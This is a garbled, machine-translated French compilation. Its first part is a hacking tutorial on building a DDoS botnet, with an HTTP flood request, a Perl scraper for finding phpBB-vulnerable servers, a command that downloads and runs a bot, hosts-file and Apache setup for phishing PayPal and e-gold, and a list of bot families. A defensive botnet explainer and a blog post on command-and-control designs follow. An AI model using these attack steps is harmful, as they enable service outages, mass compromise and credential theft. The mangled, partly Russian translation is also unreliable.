La cloche.

Il y a ceux qui ont lu cette nouvelle devant vous.
Abonnez-vous pour recevoir des articles frais.
E-mail
Nom
Nom de famille
Comment voulez-vous lire la cloche
Sans spam

Les systèmes de protection sont constamment améliorés, les programmeurs deviennent plus expérimentés. Maintenant, il est autorisé à des erreurs moins et moins connues.

[prologue]
Internet est écrasé d'une force énorme. Khakura devient plus difficile à chercher des vulnérabilités. Les administrateurs sont utilisés pour protéger le développement des eksperts de sécurité les plus cool. Connaissez-vous vos pensées? En fait, il y a beaucoup de vulnérabilités sur Internet, c'est un peu de sens. Eh bien, il est toujours possible de voir ici, imaginez la situation, vous avez une sorte de bâtard réseau, vous voulez la punir. Aujourd'hui, nous parlerons de créer notre propre botnet de combat.
Alors, quel est le "bot". La personne non initiée immédiatement en mémoire se précipiter des adversaires stupides dans jeux d'ordinateurque vous tirez en deux minutes. Oui, c'est en partie si. Dans notre cas, le "bot" est un programme qui exécute les équipes intégrées. VRODI n'est rien spécial. Quelqu'un s'opposera: "Je dis-je, en cinq ans, je l'ai écrit, vous cliquez sur le bouton et le programme, Olya-la, ferme" pour oublier l'enfance. Nous savons tous que les capacités du codage sont infinies et il est possible de l'utiliser pour le bien et le mal. Bien sûr, nous utilisons toujours notre développement avec de bonnes intimations. "Botnet" est beaucoup de bottes de recueillies dans un centre, qui exécutent synchrone les commandes du propriétaire. Bots, au fait, surtout visé davantage sur les machines Windows. Ici, vous et les mots de passe peuvent être pris en charge, et SOX à mettre, ainsi que le format de la vis, je vais éloigner des règles et expliquer comment créer un botnet de voitures Nix. La fonction principale de notre bot est une restriction Ddos atak.. il façon parfaite Utilisez de larges canaux de serveurs Nix. Compter. Le serveur que vous souhaitez "remplir" est debout sur un canal de 100 Mo. C'est-à-dire que 10-20 robots debout sur le même canal vont rouler le serveur un instant. Si l'un d'un serveur peut être recouvert d'un pare-feu, alors de plus de bots, hélas, aucun sauvetage

[Nous écrivons bot]
Inscription Exemplaire Bot Vous trouverez sur un lien à la fin de l'article. Nous comprendrons un peu avec le code. (Euh, rêve encore tout est contrôlé via irc? Via Web!). Au fait, le contrôle via IRC a été choisi par son interactivité. Supposons que je souhaite modifier des exploits nucléaires locaux un couple de serveurs dans un botnet. Je viens de mettre en place les outils de l'équipe SH Uname -a et trouvez instantanément l'ordinateur dont j'ai besoin. Ensuite, il effectue également la commande dans le client IRC, chargez BACDOR et obtient une coque interactive pour une action ultérieure. Les caractéristiques sont sans limites. Vous direz - vous pouvez mettre en œuvre un tel contrôle via le Web, mais pourquoi redémarrer la page et dépenser le trafic? Gorryozda Il est plus pratique d'observer tout en temps réel (bien que, avec plus de 1000 botnets, cela s'occupera de la commodité de l'interface. Senseur de balayage). Beaucoup de gens pensent que la restriction des DDO est très complexe. Voici un exemple du code de l'attaque habituelle:

Get /Server.org http / 1.0 \\ r \\ nconnection: Garde-Alive \\ R \\ Nuser-Agent: Mozilla / 4.75 (X11; U; Windows 5.2 I686) \\ R \\ Nhost: Server.org:80\\RG:80\\RG:80\\RG:80\\RGOTH image / gif, image / xx-xbitmap, image / jpeg, image / pjpeg, image / png, * / * \\ r \\ naccept-coding: gzip \\ r \\ naccept-langue: en \\ r \\ naccept-charset: est 8859 -1, *, utf-8 \\ r \\ n \\ r \\ n

C'est-à-dire que nous envoyons simplement la demande au serveur le forçant à y répondre. De plus, envoyez-le jusqu'à ce que le serveur ne tombe pas du manque de trafic ou de temps de processeur. Mais êtes-vous limité à Seul Nix Bots, vous devez créer des botnets Windows, par exemple sur Agobot. Pour ce faire, vous pouvez créer un certain code pour le bot qui numérisera sur le sujet des vulnérabilités LSASL / DCOM de la machine connectée au serveur sur lequel le bot est installé.

[Créer un botnet]
Créer en fait Botnet est très facile. Pour ce faire, nous devrons trouver une vulnérabilité dans n'importe quel script Web. La vulnérabilité trouvée doit permettre aux commandes d'écriture interphatique d'exécuter. Lorsque vous trouvez une vulnérabilité, faites attention au nom du fichier de sac, son titre, le nom du système vulnérable. Maintenant, avec ces données, vous devez faire un bon requête de recherche. Par exemple, l'insertion de la vulnérabilité bien connue dans phpBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$ Sock \u003d io :: socket :: inet-\u003e nouveau (peeraddr \u003d\u003e "search.aol.com", peerport \u003d\u003e "" 80 ", p ro to \u003d\u003e" TCP ") ou ensuite; Imprimer $ chaussette "get / ooolcom / recherche? Q \u003d Vieftopic.php% 3ft% 3D7 et étage \u003d 0 & page \u003d $ n http / 1.0 \\ n \\ n"; @Resu \u003d.<$sock>; Fermer ($ chaussette);

Wget http://server.org/bot.c -o Bash; chmod + x bash; ./ bash;

Ici, vous pouvez voir deux problèmes à la fois. Wget et GCC ne peuvent être ni leur utilisation seront interdits. Ici, les chaises à bascule Fech, Curl et Get ou Console Browser Lynx vous aideront, ou utilisez le protocole FTP. Sa réalisation est plus compliquée, mais aussi que FTP est qu'il existe partout sur le compilateur, vous pouvez simplement compiler le binaire sur ma coquille et espérer que tout ira bien avec la compatibilité ou réécrire le bot aux langues interprédées - Perl ou php. Chaque méthode présente ses avantages et ses inconvénients, que utiliser votre choix. J'avais l'habitude d'utiliser le serveur capturé au maximum. Après tout, le bot sur le serveur Nix ne durera que jusqu'au premier redémarrage de la machine. De cette situation, il y a une production intéressante. Le bot recherchera des fichiers interphatilitaires (.pl, .php) disponibles sur l'entrée et ajoutez le code de téléchargement et démarrez le bot. Ou vous pouvez créer un autre botnet vent. Il est également mis en œuvre facilement. Ici, nous avons besoin d'une vulnérabilité à l'exserver Internet ( Internet Explorer., Opera, Mozilla) qui conduit au saut et exécutez le fichier souhaité. Suivant est créé Enregistrement d'enregistrement en téléchargement de notre code malveillant. Cette entrée est ajoutée à tous les fichiers d'index (ou dans tout ce qu'il y a code HTML, tout dépend de votre arrogance). Avec un tel travail, un petit script s'adresse parfaitement au danger que vous trouverez également dans les archives. Bagzazz rempli d'enregistrements sur les vulnérabilités critiques dans Internet Explorer, de sorte que, dans notre subordination, vous serez Broyenet sur Systèmes Windows (Ses avantages que j'ai mentionnés ci-dessus). Tout, lancez notre ver de recherche sur l'esclave à grande vitesse, boire du café (bière, vodka, jus de tomate) survient sur le canal IRC indiqué dans les propriétés du bot et observe le nombre de vos subordonnés. En conclusion, je veux transmettre bonjour à tous ceux qui me connaissent et vous souhaitent bonne chance. Ne venez pas.
Xxxxhhhhhhhhhhhhhhhhhhhh xxx

La vulnérabilité dans PHPBB est pertinente jusqu'à 2.0.16, bien que les développeurs affirment qu'ils étaient corrigés au 2.0.11

Http://_exploits.ath.cx/exploits/data/bots/ http://wwww.honeynet.org.

Hameçonnage
Il est très pratique d'utiliser des bots comme une organisation de phishing. Pour ce faire, nous avons besoin de pages spéciales affûtées sous la page de phishing émulant le site dont nous avons besoin et bon hébergement, serveur dédié ou VDS. Ces pages peuvent être faites vous-même, acheter, trouver en ligne. Le choix est énorme. Le plus souvent phishing est organisé sur des sites: e-gold.com, paypal.com, citybank.com, usbank.com, eBay.c OM et d'autres, de toute façon, en relation avec le commerce électronique. Suivant, Windows Bot réécrit le fichier \\ System32 \\ Drivers \\ etc \\ hosts Ajouter l'adresse IP de votre serveur et attribuant le site dont vous avez besoin. Le format de fichier est comme suit:

102.54.94.97 e-gold.com 102.54.94.97 PayPal.com

IE, scores dans les sites de navigateur e-gold.com et paypal.com L'utilisateur contient notre serveur n'est rien de suspect. À son tour, des enregistrements sur les domaines concernés sont ajoutés au serveur Fisher dans httpd.conf.

DocumentOrot "/Home/e-gold.com/www" ServerName "www.e-gold.com" Serveralias "e-gold.com" "www.e-gold.com"

Il sera compris dans la ligne du navigateur sera toute une adresse familière E-Gold.com et même un utilisateur avancé connecté au site rien de suspension. Pour complétude de la photo, je dirai que si l'utilisateur utilise un serveur proxy, cela ne fonctionnera pas.

Bots pour tous les goûts
Agobot / phatbot / Furbot / xtrembot
C'est la meilleure famille de bouteilles. Écrit sur c ++. Il existe de nombreuses fonctions de protection de détection et dispose de plus de 500 modifications dues à une structure modulaire clairement prononcée.
SDBOT / RBOT / URBOT / URXBOT
Très populaire à la date des attaques DDO. Avoir de nombreuses fonctionnalités supplémentaires. Telle que l'ouverture de Sock4, Keylogger, un scanner de LSASS automatique et des vulnérabilités DCOM. A également la fonction de redirection de demandes aux sites des entreprises antivirus au serveur local en édition \\ System32 \\ Drivers \\ etc \\ hôtes et installation d'un petit faux serveurs web sur 80 ports.
Bots DSNX.
Ce bot peut organiser des attaques DDO, numériser des ports et quelques petites choses.
Q8 bots.
Excellent bot sous le système Nix. Il a son code compact (27 kb, consiste en un seul fichier) et non de mauvaise fonctionnalité. Il peut être mis à jour de manière dynamique en téléchargeant et en exécutant un nouveau fichier. Eh bien implémente la mise en œuvre de base des DDO (Syn-Flood, UDP-Flood). Capable d'effectuer des équipes système. Également assez bien masqué dans le système.
kaiten.
Aussi un bon bot sous le système UNIX / Linux. Capable d'ouvrir une coque distante sur le serveur de séquence.
Bots à base de perl
Ce sont de très petits bots écrites sur Perl. Utilisé pour les attaques DDO sur des systèmes basés sur UNIX.

---
L'article a un grand biais vers le piratage, de sorte qu'il est incompréhensible - demandez.

Aujourd'hui, les botnets sont devenus l'un des principaux outils des cybercriminels. Computerbild indiquera ce que les botnets sont la manière dont ils fonctionnent et comment économiser votre ordinateur d'entrer dans le réseau zombie.

Un botnet, ou un réseau de zombies, est un réseau d'ordinateurs infectés par un programme malveillant qui permet aux attaquants de gérer à distance les autres personnes sans la connaissance de leurs propriétaires. DANS dernières années Les réseaux de zombies sont devenus une source de revenus stable pour les cybercriminels. Les coûts constamment bas et le minimum de connaissances nécessaires au contrôle des botnets contribuent à la croissance de la popularité et, d'où le nombre de botnets. Sur les attaques DDO ou le courrier de spam, effectuée avec des réseaux de zombies, des attaquants et de leurs clients gagnent des milliers de dollars.

Mon ordinateur est-il infecté par un bot?

Répondez à cette question n'est pas facile. Le fait est que, pour suivre l'intervention des bots dans le travail quotidien du PC, est presque impossible, car elle n'affecte pas la vitesse du système. Néanmoins, il existe plusieurs signes pour lesquels il est possible de déterminer qu'un bot est présent dans le système:

Les programmes inconnus tentent de se connecter à Internet, ce qui perturbe périodiquement le logiciel pare-feu ou antivirus;

Le trafic Internet devient très grand, bien que vous utilisiez le réseau très modérément;

Dans la liste des processus du système d'exécution, le nouveau masquage dans les processus Windows habituels apparaissent (par exemple, le bot peut porter le nom Scvhost.exe - Ce nom est très similaire au nom du système. processus Windows svchost.exe; Il est assez difficile de remarquer la différence, mais - c'est possible).

Pourquoi les botnets sont créés

Batnets sont créés pour gagner de l'argent. Plusieurs zones d'utilisation commerciale bénéfique des réseaux de zombies sont disponibles: Attaques DDO, Collection information confidentielle, Spema, Spam, Phishing, Spam, Cheat Cliquez sur Compteurs, etc. Il convient de noter que n'importe quelle direction sera rentable, quel que soit l'attaquant qui ne choisit pas et que Botnet vous permet de réaliser toutes les activités répertoriées en même temps.

Attaque DDO (de l'anglais. Le déni de service distribué) est une attaque sur système d'ordinateurPar exemple, sur le site Web, le but est d'apporter le système à la "chute", c'est-à-dire les États lorsqu'il ne peut plus recevoir et traiter les requêtes des utilisateurs légitimes. L'une des méthodes d'attaque DDO les plus courantes consiste à envoyer de nombreuses demandes à un ordinateur ou à un site de sacrifice, ce qui entraîne un refus de maintenance si les ressources de l'ordinateur attaqué par l'ordinateur ne suffisent pas à gérer toutes les demandes entrantes. Les attaques DDO sont formidables armes pirateuses et Botnet est un outil idéal pour leur tenue.

Les attaques DDO peuvent être à la fois un moyen de lutte compétitive injuste et d'actes de cyberrorisme. L'hôte de Botnet peut avoir un service à quiconque pas trop scrupuleux entrepreneur - pour organiser une attaque DDO sur le site de son concurrent. La ressource attaquée après une telle charge "volonté", le client de l'attaque recevra un avantage temporaire et la cybercriminalité est une récompense modeste (ou non).

De la même manière, les propriétaires de Botnet eux-mêmes peuvent utiliser des attaques DDO pour extorquer de l'argent des grandes entreprises. Dans le même temps, les entreprises préfèrent répondre aux exigences des cybercriminels, car l'élimination des conséquences des attaques de DDO réussis est très coûteuse. Par exemple, en janvier 2009, l'une des plus grandes hosters de GoDaddy.com a été soumise à une attaque DDO, à la suite de laquelle des milliers de sites postés sur ses serveurs se sont avérés inaccessibles pendant presque une journée. Les pertes financières de l'hébergement étaient énormes.

En février 2007, un certain nombre d'attaques sur les serveurs DNS racine ont eu lieu, le fonctionnement normal de l'intégralité de l'Internet dépend directement de l'opération. Il est peu probable que le but de ces attaques soit l'effondrement du réseau mondial, car l'existence de réseaux de zombies n'est possible que sous la condition qu'il y ait et exploite normalement Internet. La plupart de tout cela était similaire à la démonstration de la force et des possibilités de réseaux de zombies.

Les services publicitaires pour la mise en œuvre des attaques DDO ont ouvertement affiché sur de nombreux forums de thèmes pertinents. Les prix d'attaque fluctuent de 50 à plusieurs milliers de dollars par jour de fonctionnement continu DDOS-Botnet. Selon le site www.shadowserver.org, pour 2008, environ 190 000 attaques DDO ont eu lieu sur lesquels des cybercriminels ont pu gagner environ 20 millions de dollars. Naturellement, ce montant n'inclut pas les revenus du chantage, qui est tout simplement impossible à calculer.

Recueillir des informations confidentielles

Les informations confidentielles stockées sur les ordinateurs des utilisateurs attirent toujours des intrus. Les numéros de carte de crédit, les informations financières et les mots de passe pour différents services sont les plus grands intérêts: boîtes aux lettres, serveurs FTP, messager et autres. En même temps, moderne programmes malveillants Permettez aux attaquants de choisir exactement les données qui sont intéressantes - pour cela, il suffit de charger le module correspondant sur le PC.

Les malfaiteurs peuvent vendre des informations volées ou l'utiliser dans leurs propres intérêts. Un centaines d'annonces pour la vente de comptes bancaires apparaissent sur de nombreux forums en ligne. Le coût du compte dépend de la somme d'argent sur le compte de l'utilisateur et de 1 à 1 500 $ en raison de. La frontière inférieure suggère que lors de la lutte concurrentielle, les cybercriminels impliqués dans ce type d'entreprise sont obligés de réduire les prix. Pour gagner plus que beaucoup, ils ont besoin d'un afflux stable de données fraîches. Pour cela, une croissance stable des réseaux de zombies est requise. Informations financières particulièrement intéressantes Cardiers - attaquants engagés dans de fausses cartes bancaires.

En ce qui concerne ces opérations, il est possible de juger de l'histoire bien connue avec un groupe de cybercriminels brésiliens, qui ont été arrêtés il y a deux ans. Ils ont pu éliminer les utilisateurs ordinaires des comptes bancaires de 4,74 millions de dollars en utilisant des informations volées avec des ordinateurs. Dans l'acquisition de données personnelles qui n'ont pas de relations directes avec l'argent des utilisateurs et les criminels qui sont engagés dans de faux documents, l'ouverture de faux comptes bancaires, commettre des transactions illégales, etc.

Un autre type d'informations recueillies par les botnets sont des adresses e-mail, de plus, contrairement aux numéros de carte de crédit et aux comptes, du carnet d'adresses d'un PC infecté, vous pouvez extraire beaucoup adresses mail. Les adresses collectées sont exposées à la vente et parfois «pour le poids» - un plus pauvre. Les principaux acheteurs d'un tel "produit" sont des spammeurs. La liste d'un million d'adresses de messagerie coûte de 20 à 100 dollars et la newsletter ordonnée au même million d'adresses est de 150 à 200 dollars. L'avantage est évident.

Les criminels sont également intéressants comptes Valide services payés et magasins en ligne. Bien sûr, ils sont moins chers que les comptes bancaires, mais leur mise en œuvre est associée à un risque de persécution plus faible par les agences de l'application de la loi.

Des millions de messages de spam courent chaque jour dans le monde entier. Le mailing d'un courrier indéfini est l'une des principales fonctions des botnets modernes. Selon le laboratoire de Kaspersky, environ 80% de l'ensemble du spam est envoyé via le réseau zombie. Des ordinateurs utilisateurs respectueux de la loi Des milliards de lettres avec la publicité «Viagra» sont envoyées, des copies d'heures coûteuses, des casinos en ligne, etc., de la notation des canaux de communication et des boîtes aux lettres. Ainsi, les pirates informatiques mettent sous le poinçon d'ordinateurs dans tout autre utilisateur: les adresses à partir de laquelle la distribution est effectuée dans des listes noires des entreprises antivirus.

Au cours des dernières années, le sphère des services de spam a été élargi: le spam ICQ est apparu, Spam dans réseaux sociaux, forums, blogs. Et ceci est également un "mérite" des propriétaires de Botnet: après tout, il est tout à fait facile d'ajouter un module supplémentaire au client BOT, ouvrant les horizons pour la nouvelle entreprise avec Slogans comme "Spam sur Facebook. Peu coûteux. " Les prix du spam varient en fonction du public cible et du nombre d'adresses auxquelles la distribution est effectuée. Larction des prix des objectifs - à partir de 70 dollars sur des centaines de milliers d'adresses pouvant atteindre 1 000 dollars par peu de dizaines de millions de discours. Au cours de la dernière année, les spammeurs ont gagné environ 780 millions de dollars en envoyant des lettres.

Créer un spam de recherche

Une autre option d'utilisation des botnets est d'augmenter la popularité des sites dans les moteurs de recherche. Travaille sur optimisation du moteur de recherche, les administrateurs de ressources tentent d'augmenter la position du site dans les résultats de la recherche, car plus haut, plus les visiteurs se rendent sur le site à travers moteurs de recherche Et, par conséquent, plus le chiffre d'affaires du propriétaire du site sera grand, par exemple, de la vente d'espaces publicitaires sur des pages Web. De nombreuses entreprises paient beaucoup d'argent aux maîtres Web afin qu'ils apportent le site à la première position dans les "moteurs de recherche". Les propriétaires de Botnet espiègent certaines de leurs techniques et ont automatisé le processus d'optimisation des moteurs de recherche.

Lorsque vous voyez dans les commentaires à votre dossier dans le "Live Journal" ou une photo réussie définie sur l'hébergement de photos, de nombreux liens créés par la personne inconnue de vous, et parfois votre "ami" - ne soyez pas surpris: juste quelqu'un commandé la promotion de votre ressource aux propriétaires Botnet. Un programme spécialement créé est chargé dans un ordinateur zombie et au nom de son propriétaire laisse des commentaires sur des ressources populaires en référence au site de filature. Le prix moyen des services de spam illégaux est d'environ 300 dollars par mois.

Combien de données personnelles coûtent

Le coût des données personnelles volées dépend directement du pays dans lequel vit leur propriétaire juridique. Par exemple, les données totales du résident américain sont de 5 à 8 dollars. Sur le marché noir, ces résidents de l'Union européenne sont particulièrement appréciés - ils sont deux à trois fois plus chers que les données des citoyens américains et du Canada. Cela peut être expliqué par le fait que de tels criminels de données peuvent jouir dans n'importe quel pays inclus dans l'UE. En moyenne, le prix d'un paquet de données complète d'une personne est d'environ 7 $.

Malheureusement, à celui qui a décidé "de zéro" pour organiser un botnet, ne sera pas beaucoup de difficulté à trouver une instruction sur la création d'un réseau de zombies sur Internet. Première étape: créer un nouveau réseau zombie. Pour ce faire, infectez les utilisateurs d'utilisateurs avec un programme spécial - Bot. Pour l'infection, le courrier de spam, la publication de messages sur des forums et des réseaux sociaux et d'autres techniques; Souvent, le bot est doté d'une fonction de soi-prolifération comme des virus ou des vers.

Pour faire une victime potentielle pour établir un bot, utiliser des techniques d'ingénierie sociale. Par exemple, il est proposé de voir une vidéo intéressante, qui nécessite de télécharger un codec spécial. Après le téléchargement et le démarrage d'un tel fichier, l'utilisateur, bien sûr, ne sera pas en mesure de voir des vidéos et ne remarquerez probablement aucune modification du tout, et son PC sera infecté et devient un serviteur soumis effectuant toutes les commandes de la hôte du botnet.

La deuxième méthode d'infection largement utilisée avec des bots est en mot-forme. Lorsque vous visitez la page Web infectée par l'utilisateur sur son ordinateur via divers "trous" dans les applications - Tout d'abord dans les navigateurs populaires - le code malveillant est chargé. Exploiter des faiblesses utilisées programmes spéciaux - Exploitez. Ils permettent non seulement téléchargés imperceptiblement, mais également de lancer imperceptiblement un virus ou un bot. Ce type de diffusion de logiciels malveillants est le plus dangereux, car si une ressource populaire est piratée, des dizaines de milliers d'utilisateurs seront blessés!

Bot peut être alimenté par la fonction de déménagement de soi réseaux informatiques. Par exemple, il peut être distribué en infectant tous les fichiers exécutables disponibles ou en recherchant et infectés par des ordinateurs réseau vulnérables.

Ordinateurs infectés. Rien d'utilisateurs suspects Le créateur de Botnet peut être contrôlé à l'aide du centre de commande Botnet, de liaison aux robots via le canal IRC, d'une connexion Web ou de tout autre outil disponible. Il suffit de combiner plusieurs dizaines de voitures sur le réseau afin que le Bottnet ait commencé à apporter des revenus à son maître. De plus, ce revenu est en dépendance linéaire sur la stabilité du réseau zombie et ses taux de croissance.

Les entreprises de publicité fonctionnant en ligne selon le schéma PPC (Pay-Per-clic) Payez de l'argent pour des clics uniques sur les liens des annonces publiées sur Internet. Pour les propriétaires BAPTNET, la tromperie de telles entreprises est une occupation rentable. Par exemple, vous pouvez prendre un réseau bien connu. Google adsense. Les annonceurs inclus dans elle sont en train de payer Google pour des clics sur des annonces publiées dans l'espoir que l'utilisateur qui avait l'air "sur la lumière" achètera quelque chose d'eux.

Google à tour de rôle publicité contextuelle Sur les différents sites impliqués dans le programme AdSense, en payant le pourcentage du propriétaire du site de chaque clic. Hélas, tous les propriétaires de sites ne sont pas honnêtes. Ayant un réseau zombie, un pirate informatique peut générer des milliers de clics uniques par jour - un avec chaque machine, afin de ne pas causer de suspicion spéciale de Google. Ainsi, l'argent dépensé sur compagnie publicitaire, couler dans la poche au pirate informatique. Malheureusement, il n'y avait pas un seul cas lorsque quelqu'un a été attiré pour de telles actions. Selon Click Forensics, en 2008, environ 16 à 17% de tous les traducs sur des liens publicitaires étaient contrefaits, dont le troisième a été généré par un botnet. Après avoir effectué des calculs non compliqués, on peut comprendre que l'année dernière, les propriétaires des Botnets «bloquaient» 33 000 000 dollars. Pas de mauvais revenu des clics avec la souris!

Les attaquants et les hommes d'affaires impur aux mains ne créent pas nécessairement pas nécessairement un botnet "à partir de zéro". Batnets de différentes tailles et performances qu'ils peuvent acheter ou louer des pirates informatiques - par exemple, en contactant des forums spécialisés.

Le coût du botnet fini, ainsi que le coût de son bail, dépend directement du nombre d'ordinateurs inclus. La plus grande popularité des botnets prêts à l'emploi aiment sur des forums anglophones.

Les petits bâtons, composés de plusieurs centaines de bots, coûtent de 200 à 700 dollars. Où prix moyen Un bot est d'environ 50 cents. Les gros botnets sont de gros argent.

Le réseau Zombie Shadow, créé il y a plusieurs années par un pirate informatique de 19 ans de Hollande, avait plus de 100 000 ordinateurs situés dans le monde entier, vendu pendant 25 000 euros. Pour cet argent, vous pouvez acheter une petite maison en Espagne, cependant, le criminel du Brésil a préféré acquérir un botnet.

Outils de protection contre les botnets

1. Tout d'abord, ce sont des programmes anivaux et des forfaits complets pour protéger contre les menaces Internet avec des bases régulièrement mises à jour. Ils contribueront non seulement à détecter le danger dans le temps, mais également à l'éliminer avant que votre zombie tournant la fidèle "Iron Friend" commencera à envoyer des sites de spam ou de "goutte". Forfaits complexes, tels que Kaspersky internet Security 2009, contient un ensemble complet fonctions de protection, Vous pouvez gérer ce qui est possible dans le centre de commandement général.

Module antivirus B. mode de fond Effectue la numérisation des zones système les plus importantes et contrôle toutes les roues possibles d'invasion des virus: pièces jointes et sites Web potentiellement dangereux.

Le pare-feu surveille l'échange de données entre ordinateur personnel et Internet. Il vérifie tous les paquets de données reçus du réseau ou envoyé là-bas, et si nécessaire, bloque les attaques de réseau et empêche l'envoi secret des données personnelles à Internet.

Le filtre anti-spam protège la boîte aux lettres de la pénétration de messages publicitaires. Sa tâche inclut également l'identification de lettres de phishing, avec l'aide de laquelle les attaquants tentent de supporter des informations sur ses données pour entrer en ligne de paiement ou de systèmes bancaires.

2. Mise à jour régulière système opérateur, navigateurs Web et autres applications dont les développeurs sont détectés et éliminer de nombreux bars dans leur protection. points faiblesutilisé par les intrus.

3. Le programme spécial de cryptage protégera vos données personnelles, même si le bot est entré dans l'ordinateur, car pour y accéder, il devra pirater le mot de passe.

4. Bon sens et prudence. Si vous souhaitez protéger vos données d'un autre type de menaces, vous ne devez pas télécharger et installer des programmes d'origine inconnue, ouvrir des archives avec des fichiers contrairement aux avertissements antivirus, allez sur des sites que les marques de navigateur sont dangereuses, etc.

Nous remercions Kaspersky Lab de l'aide dans la préparation du matériel

Pas étonnant que j'ai publié mon projet notes sur les réseaux pirings . Commentaires Les lecteurs se sont avérés très utiles. Ils m'ont inspiré pour plus de travail dans cette direction. Qu'est-il arrivé de cela - regardez sous la coupe.

Comme on peut le voir du nom de la poste, il sera aujourd'hui discuté de Botnets. À propos de partage de fichiers, de réseaux de proxy, de peerbogs et de monnaie P2P pendant un moment oublié.

Sous le mot "botnet" ne doit pas être compris quelque chose d'illégal. Lorsque l'utilisateur télécharge et installe volontairement le "bot" afin de sacrifier ses ressources de trafic et de calcul aux besoins du projet scientifique, il est également botnet. En conséquence, le Botmaster n'est pas nécessairement un criminel. Un groupe de 30 scientifiques impliqués dans le projet scientifique est également "Botmaster".

1. Contrôle Bottenet via Server

Le moyen le plus simple de contrôler les bots est de démarrer le serveur IRC / HTTP. À travers cela, les bots recevront des commandes et avec son aide pour envoyer le résultat de leur exécution.

Je dessine, comme je peux :) Dans ce cas, l'illustration peut ne pas être requise, mais j'ai décidé de vous préparer au choc, qui produira d'autres images.

  • Mise en œuvre très simple, en particulier dans le cas de l'IRC.
  • Bots de réponse rapide.
  • Vous pouvez donner des commandes à la fois tout le réseau et un bot spécifique.
  • Si le réseau se compose de centaines de nœuds, un canal de Dalnet suffit à la gérer. Pour les réseaux, il peut être plus grand en hébergement Web à faible coût (environ 300 roubles / mois).
  • Dans le cas de httpTheserver est grandement simplifié par le développement d'une belle interface utilisateur. Ceci est important si nous utilisons des botnets dans certains services Web.
  • Charger sur le serveur. Le nombre de nœuds dans les plus grands botnets est mesuré par des millions. Pour contrôler une telle foule, un serveur est petit.
  • Si quelque chose arrive au serveur (l'accident sur le réseau, DDO, un incendie dans le centre de données), le réseau se terminera.
  • Un serveur est facile à démarrer. Cela peut être fait à la fois le fournisseur et les produits de Kaspersky Lab sur un ordinateur utilisateur.
  • Botmaster est relativement facile à trouver. Une fois oublié à propos de VPN - attendez les invités dans les chaînes.
  • Dans le cas de l'IRCLes équipes reçoivent uniquement des bots en ligne. Si le bot va sur le canal en deux minutes après l'envoi de l'équipe, ce sera "pas dans le sujet".
  • Le nombre de robots et de leur IP peuvent être déterminés en allant au canal IRC. Le mot de passe de protection des canaux ne vous aidera pas, car ce dernier est facile à creuser hors du code BOT.

2. Gestion via le réseau IRC

Une étape logique pour lutter contre les minus de la méthode précédente n'est pas un serveur, mais plusieurs. À mon avis, le moyen le plus simple de faire est de soulever votre réseau IRC. Dans ce cas, toutes les responsabilités du transfert de données entre serveurs tombent sur protocole IRC . Du côté des bots, il n'y aura aucune différence par rapport à la décision précédente.

  • Mise en œuvre simple, bien que vous devez être confronté à la configuration des serveurs.
  • Les bots répondent toujours rapidement aux équipes.
  • Vous pouvez toujours donner des commandes à un bot spécifique.
  • Distribution de chargement entre serveurs, protection contre DDO et force majeure. Dizaines bons serveurs Cela peut suffire à un réseau d'un million de bots.
  • Si vous refusez une partie des serveurs, vous pouvez les remplacer par eux.
  • Si IRC est utilisé Et confondez mille bots assis sur le même canal, utilisez plusieurs canaux. En conséquence, vous pouvez donner différentes tâches dans différentes parties du réseau.
  • Nous devrons devoir sortir avec le serveur / VDS.
  • Vous pouvez acheter tous les serveurs en même temps et le Botmaster n'aura pas le temps de les remplacer.
  • Botmaster est toujours assez facile pour suivre.
  • Dans le cas de l'IRC, le nombre de robots et de leur adresse IP est toujours en vue.
  • Des robots qui viennent d'entrer dans le canal, pas dans le sujet.

Terme Tresting (anneau de confiance, cercle / anneau de confiance) J'ai d'abord entendu le camarade nickolas dans commentaires à la note précédente. Nous parlons Il est sur le point de confier la fonction "Serveurs" sur une partie du botnet.

  • Aucun serveur n'a besoin.
  • La triage peut être composée de centaines de nœuds. Augmenter et contrôler un tel certain nombre de serveurs IRC / HTTP n'est pas facile.
  • Les robots ne doivent pas constamment garder la connexion avec la tournée. Il suffit de vérifier toutes les 5-10 minutes si de nouvelles commandes n'apparaissaient pas. Chaque équipe devrait avoir TTL au cours de laquelle elle est stockée dans la visite.
  • Un grand nombre de "serveurs" assurent la stabilité du réseau à toutes sortes de catastrophes. Lorsqu'une partie de la bague est exceptionnelle, le Botmaster peut donner une équipe à la création d'une nouvelle tarte. Ou il peut faire les nœuds des anneaux eux-mêmes (vous avez besoin de signatures numériques et du consentement d'un certain pourcentage de Trus).
  • Laissez la dégustation consiste en 512 nœuds, au moins 50% sont constamment en ligne. S'il y a 1 000 000 bots sur le réseau et chacun d'entre eux est constamment en ligne, moins de 4 000 bots ont moins de 4 000 robots. Lorsque vous êtes invité par les commandes de bot (ou lors de l'envoi du résultat) toutes les 10 minutes, chaque nœud d'anneau traitera simultanément une moyenne de 7 composés. Un peu pour le réseau de cette taille, non?
  • Seul Botmaster peut obtenir la liste exacte de tous les Botmaster.
  • Vous pouvez donner des commandes un bot ou un groupe de robots spécifiques.
  • Réaction de bouteille rapide aux équipes.
  • Botmaster est difficile à trouver.

Le seul minus, que je vois est la complexité de la mise en œuvre.

4. Réseaux de pirographie

Si vous croyez que les sources Internet, les botnets P2P sont actuellement très populaires. Parmi ces sources, il y a une plus grande attention. Chaque nœud d'un tel réseau ne connaît que quelques nœuds "voisins". Le Botmaster envoie des commandes à plusieurs nœuds de réseau, après quoi elle est transmise du voisin au voisin.

La liste des voisins est émise à des bots une fois sur un serveur spécial. Ce peut être, par exemple, site piraté. Plus de serveur ne fait rien, il n'est nécessaire que lors de l'ajout de nœuds dans Botnet.

  • La mise en œuvre est un peu plus facile que dans le paragraphe précédent.
  • Charge minimale sur tous les nœuds de réseau. La taille du botnet est presque illimitée.
  • Résistance aux DDO, déconnexion des nœuds et ainsi de suite. P2P-Botnet est presque impossible de démarrer.
  • Pas de connexions permanentes, comme dans le cas de l'IRC.
  • Besoin d'un serveur, bien que pas longtemps.
  • Les nœuds de temps en temps meurent, qui affecte la connectivité réseau.
  • Pour obtenir une liste de tous les robots, vous avez besoin, par exemple, leur donner une commande de référence à un site spécifique. Dans ce cas, rien ne garantit que la liste ne recevra que Botmaster.
